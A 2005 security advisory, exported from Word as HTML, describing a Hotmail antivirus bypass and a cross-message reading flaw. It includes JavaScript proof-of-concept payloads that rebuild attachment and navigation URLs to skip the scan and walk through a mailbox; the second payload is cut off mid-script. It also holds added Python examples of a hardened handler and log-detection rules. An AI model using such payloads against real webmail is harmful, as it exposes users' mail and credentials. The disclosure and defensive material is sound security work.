<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
        {font-family:Wingdings;
        panose-1:5 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0cm;
        margin-bottom:.0001pt;
        font-size:12.0pt;
        font-family:"Times New Roman";}
a:link, span.MsoHyperlink
        {color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {color:purple;
        text-decoration:underline;}
span.EstiloCorreo17
        {mso-style-type:personal-compose;
        font-family:Arial;
        color:windowtext;}
@page Section1
        {size:595.3pt 841.9pt;
        margin:70.85pt 3.0cm 70.85pt 3.0cm;}
div.Section1
        {page:Section1;}
/* List Definitions */
@list l0
        {mso-list-id:806313585;
        mso-list-type:hybrid;
        mso-list-template-ids:-212031462 1895479346 201981977 201981979 201981967 201981977 201981979 201981967 201981977 201981979;}
@list l0:level1
        {mso-level-tab-stop:36.0pt;
        mso-level-number-position:left;
        text-indent:-18.0pt;
        mso-ansi-font-weight:bold;}
@list l1
        {mso-list-id:1266041151;
        mso-list-type:hybrid;
        mso-list-template-ids:1936496974 201981967 201981977 201981979 201981967 201981977 201981979 201981967 201981977 201981979;}
@list l1:level1
        {mso-level-tab-stop:36.0pt;
        mso-level-number-position:left;
        text-indent:-18.0pt;}
@list l2
        {mso-list-id:1626353539;
        mso-list-type:hybrid;
        mso-list-template-ids:-495164942 201981953 201981955 201981957 201981953 201981955 201981957 201981953 201981955 201981957;}
@list l2:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:36.0pt;
        mso-level-number-position:left;
        text-indent:-18.0pt;
        font-family:Symbol;}
ol
        {margin-bottom:0cm;}
ul
        {margin-bottom:0cm;}
-->
</style>
</head>
<body lang=ES link=blue vlink=purple>
<div class=Section1>
<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.5pt;
padding:0cm 0cm 1.0pt 0cm'>
<p class=MsoNormal style='border:none;padding:0cm'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>This advisory is also attached as a PDF.<o:p></o:p></span></font></b></p>
</div>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal align=right style='text-align:right;text-indent:35.4pt'><i><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-style:italic'>26 April 2005<o:p></o:p></span></font></i></p>
<p class=MsoNormal align=right style='text-align:right;text-indent:35.4pt'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><b><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-weight:bold'>Hotmail
Antivirus Attachment Bypass.<o:p></o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-weight:bold'>Hotmail
Cross Site Message Explore.<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Hotmail is one
of the sites that receives the most attacks from hackers, and it is supposed to
be one of the more secure sites I have seen. But, as some people say, you never
get 100% security. The risk is always out there.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Background<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>I kept testing
this until I had some working code. The site's authorization and validation are
among the best I have seen in a mail system; I have not heard of Hotmail
vulnerabilities the way I have for other systems, and I know of only two
previously discovered flaws: one from 1999 by Georgi Guninski, and the other
when the pwdreset function was made public. Hotmail is updated every year and
keeps getting more secure, so it is hard to believe that no one has found this
before.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-left:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Description<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The flaws are
triggered when the user views the attachment: we can execute code on the user's
machine, which could result in information disclosure and credential exposure.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Analysis<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><i><font size=3 color="#3366ff"
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;color:#3366FF;
font-style:italic'>Hotmail Antivirus Attachment Bypass.<o:p></o:p></span></font></i></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This is
possible because of the way Hotmail handles HTML attachments: when we send a
file with HTML content, Hotmail will open it in a pop-up window after the
McAfee antivirus check is done, so at that point we are able to execute
arbitrary JavaScript code.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The link for
the first attachment usually looks like:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><a
href="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=SessionID&msg=MSGID&start=VAR&len=VAR&mimepart=Number&vscan=scan">http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=SessionID&msg=MSGID&start=VAR&len=VAR&mimepart=Number&vscan=scan</a><o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>If we view the
next attachment of the message, the link is the same except that mimepart is
the next number. So what happens if we request the link without the
“vscan=scan” at the end?<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Normally we
could not do this, but if we take the URL of our attachment containing the
JavaScript code and rebuild it with the next mimepart and without the
“vscan=scan”, we can call window.open(Fakedurl); the result is that
the next attachment is fetched without having to pass Hotmail's antivirus
check.<o:p></o:p></span></font></p>
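<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>As an added
example (this is not code from the advisory or from Hotmail), the following
Python sketches the server-side fix for this flaw. A weak handler scans only
when the client-supplied vscan=scan is present and renders HTML inline in the
mail origin; the hardened handler beside it scans on every fetch regardless of
the query string and delivers active content as a download with a
non-executable type, nosniff and a CSP sandbox, so script inside an attachment
never runs with the user's session. The handler names, the part dictionaries,
the scanner stand-in and the sample attachments are all constructed for the
example; the link shape is the one quoted above with placeholder values, and the
response headers are today's controls rather than anything the advisory
discusses.<o:p></o:p></span></font></p>

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample of the attachment link shape quoted in the advisory.
# SessionID and MSGID are placeholders, not real values.
ATTACHMENT_URL = ("http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg"
                  "?curmbox=F000000001&a=SessionID&msg=MSGID"
                  "&start=0&len=1024&mimepart=2&vscan=scan")

# Content types a browser would execute if rendered inline (assumed list).
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}


def parse_getmsg(url):
    """Flatten the query string of a getmsg link into a dict."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def strip_scan_flag(url):
    """Rebuild the link without the vscan=scan parameter, as the advisory describes."""
    return url.replace("&vscan=scan", "")


def scan_ok(part):
    """Stand-in for the antivirus scanner: a constructed marker rule for the example."""
    return b"MALWARE-MARKER" not in part["data"]


def serve_attachment_weak(params, part):
    """Weak: the scan runs only if the client sent vscan=scan, and the part is
    rendered inline in the mail origin with whatever content type it declares."""
    if params.get("vscan") == "scan" and not scan_ok(part):
        return {"status": 403, "headers": {}, "body": b"blocked by antivirus"}
    return {"status": 200,
            "headers": {"Content-Type": part["content_type"]},
            "body": part["data"]}


def serve_attachment_hardened(params, part):
    """Hardened: the server, not the query string, decides.
    Every fetch is scanned, and active content is delivered as a download with
    a non-executable type plus nosniff and a CSP sandbox, so script in the
    attachment never runs in the mail origin where it could read document.URL
    and the session parameters (which is exactly what the PoC relies on)."""
    if not scan_ok(part):
        return {"status": 403, "headers": {}, "body": b"blocked by antivirus"}
    ctype = part["content_type"].split(";")[0].strip().lower()
    headers = {"X-Content-Type-Options": "nosniff",
               "Content-Security-Policy": "sandbox"}
    if ctype in ACTIVE_TYPES:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = 'attachment; filename="%s"' % part["name"]
    else:
        headers["Content-Type"] = ctype
    return {"status": 200, "headers": headers, "body": part["data"]}


# Constructed attachments used by compare() and the stand-alone run.
HTML_PART = {"name": "hello.html", "content_type": "text/html",
             "data": b"an html page carrying an inline script"}
INFECTED_PART = {"name": "bad.html", "content_type": "text/html",
                 "data": b"an html page carrying MALWARE-MARKER"}


def compare(url, part):
    """Run one request through both handlers and summarise the difference."""
    params = parse_getmsg(url)
    weak = serve_attachment_weak(params, part)
    hard = serve_attachment_hardened(params, part)
    return {
        "scan_bypassed_weak": weak["status"] == 200 and not scan_ok(part),
        "weak_type": weak["headers"].get("Content-Type"),
        "hard_status": hard["status"],
        "hard_type": hard["headers"].get("Content-Type"),
    }


if __name__ == "__main__":
    # Dropping vscan=scan lets the infected part through the weak handler only.
    print(compare(strip_scan_flag(ATTACHMENT_URL), INFECTED_PART))
    # A clean HTML part is still never rendered in the mail origin by the hardened one.
    print(compare(ATTACHMENT_URL, HTML_PART))
```

<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The design
point is that a client-controlled parameter must never gate a security check:
the scan decision and the rendering decision both belong to the server, keyed on
the attachment itself. Serving user-supplied HTML from a separate, cookie-less
origin is the stronger form of the same idea.<o:p></o:p></span></font></p>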
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Risk: High<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This could
result in serious damage to users.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Proof of Concept<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'>__________________________________________________________________<o:p></o:p></span></font></b></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str1=document.URL;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str2=str1.split("?");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str3=str2[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str4=str3.split("&");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str5=str4[1]+"&"+str4[2]+"&"+str4[3]+"&"+str4[4]+"&mimepart=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str6=str4[5];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str7=str6.split("=");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str8=str7[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str9=parseInt(str8)+1;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str10=str5+str9;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str11="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str12=str11+str10;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>window.open(str12);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>Hi this is my proof of concept!.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>_______________________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-left:18.0pt'><i><font size=3 color="#3366ff"
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;color:#3366FF;
font-style:italic'>Hotmail Cross Site Message Explore</span></font></i><i><span
lang=EN-GB style='font-style:italic'>.<o:p></o:p></span></i></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-right:2.2pt;text-align:justify;text-indent:
18.0pt'><font size=3 face="Times New Roman"><span lang=EN-GB style='font-size:
12.0pt'>This is possible because of the way Hotmail handles HTML attachments:
when we send a file with HTML content, Hotmail will open it in a pop-up window
after the McAfee antivirus check is done, so at that point we are able to
execute arbitrary JavaScript code.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>In addition,
Hotmail uses the following two functions to move from one message to another:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Going to
previous message:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>javascript:S('getmsg','','','','','MSGID','','','prev','')<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Going to Next
message:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>javascript:S('getmsg','','','','','MSGID','','','next','')<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>As we can see,
we only need to pass the current message ID to the function and call it, and
the next or previous message is shown on screen, without knowing the MSGID of
that next or previous message.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>So if we
include in the attachment arbitrary JavaScript code that asks for the next
message (we can use Hotmail's own function or write our own for this), we can
get all the other messages in the account.<o:p></o:p></span></font></p>
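<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>As an added
example (not from the advisory), the following Python runs three detection
rules over constructed front-end access-log lines, covering both flaws
described above: an attachment part fetched without vscan=scan (the antivirus
bypass), a cmd=next or cmd=prev navigation whose Referer is an attachment
pop-up URL, and a session that repeats such navigations, which is what
spidering the inbox from an attachment looks like in the logs. The log format,
the session values SESSION1 and SESSION2, the rule names, the threshold and the
assumption that a pop-up opened by attachment script sends the attachment URL
as its Referer are all constructed for the example; the getmsg parameter names
are the ones that appear in the advisory.<o:p></o:p></span></font></p>

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format as used by the constructed lines below (assumption: a real
# front-end log format may differ and the regex would need adjusting).
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$')


def parse_line(line):
    """Split one access-log line into the fields the rules need, or None."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    client, when, method, target, status, referer = match.groups()
    return {"client": client, "time": when, "method": method,
            "target": target, "status": int(status), "referer": referer}


def getmsg_params(target):
    """Query parameters of a getmsg request, or None for any other handler."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/getmsg":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def analyse(lines, spider_threshold=3):
    """Apply the three rules to a list of log lines and return the findings."""
    findings = []
    nav_from_attachment = {}  # session id -> number of rule-B hits
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        params = getmsg_params(rec["target"])
        if params is None:
            continue
        session = params.get("a", "unknown")
        referer_query = parse_qs(urlsplit(rec["referer"]).query)
        referer_is_attachment = "mimepart" in referer_query
        # Rule A: an attachment part requested without the scan flag.
        if "mimepart" in params and params.get("vscan") != "scan":
            findings.append({"rule": "A-scan-skipped", "session": session,
                             "client": rec["client"], "target": rec["target"]})
        # Rule B: message navigation issued from an attachment pop-up.
        if params.get("cmd") in ("next", "prev") and referer_is_attachment:
            findings.append({"rule": "B-nav-from-attachment", "session": session,
                             "client": rec["client"], "target": rec["target"]})
            nav_from_attachment[session] = nav_from_attachment.get(session, 0) + 1
    # Rule C: repeated rule-B hits in one session look like inbox spidering.
    for session, count in nav_from_attachment.items():
        if count >= spider_threshold:
            findings.append({"rule": "C-spidering", "session": session,
                             "client": None, "target": None, "count": count})
    return findings


# Constructed sample log. Link shapes follow the advisory; values are placeholders.
HOST = "http://by17fd.bay17.hotmail.msn.com"
ATT = ("/cgi-bin/getmsg?curmbox=F000000001&a=SESSION1&msg=MSGID"
       "&start=0&len=1024&mimepart=")
NAV = ("/cgi-bin/getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=MSGID"
       "&msgread=&etype=&wo=&curmbox=F000000001&a=SESSION1")
INBOX = HOST + "/cgi-bin/HoTMaiL?curmbox=F000000001&a=SESSION1"


def log_line(client, target, referer):
    """Build one combined-format line for the constructed sample."""
    return ('%s - - [26/Apr/2005:10:00:00 +0000] "GET %s HTTP/1.1" 200 512 '
            '"%s" "Mozilla/4.0"' % (client, target, referer))


SAMPLE_LOG = [
    log_line("10.0.0.5", ATT + "1&vscan=scan", INBOX),             # normal scanned open
    log_line("10.0.0.5", ATT + "2", HOST + ATT + "1&vscan=scan"),  # rule A
    log_line("10.0.0.5", NAV, HOST + ATT + "1&vscan=scan"),        # rule B
    log_line("10.0.0.5", NAV, HOST + ATT + "1&vscan=scan"),        # rule B
    log_line("10.0.0.5", NAV, HOST + ATT + "1&vscan=scan"),        # rule B, then C
    log_line("10.0.0.9", NAV.replace("SESSION1", "SESSION2"),
             HOST + "/cgi-bin/HoTMaiL?a=SESSION2"),                # ordinary Next click
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Rule A on its
own is a one-line query over production logs and needs no Referer at all, which
makes it the cheapest check to deploy; rules B and C depend on the browser
sending the attachment URL as Referer, so treat them as corroborating signals
rather than proof.<o:p></o:p></span></font></p>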
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Risk: High<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This could result
in serious damage to users and/or information disclosure.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Proof of Concept<o:p></o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'>__________________________________________________________________<o:p></o:p></span></font></b></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str1=document.URL;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str2=str1.split("?");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str3=str2[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str4=str3.split("&");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str5="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
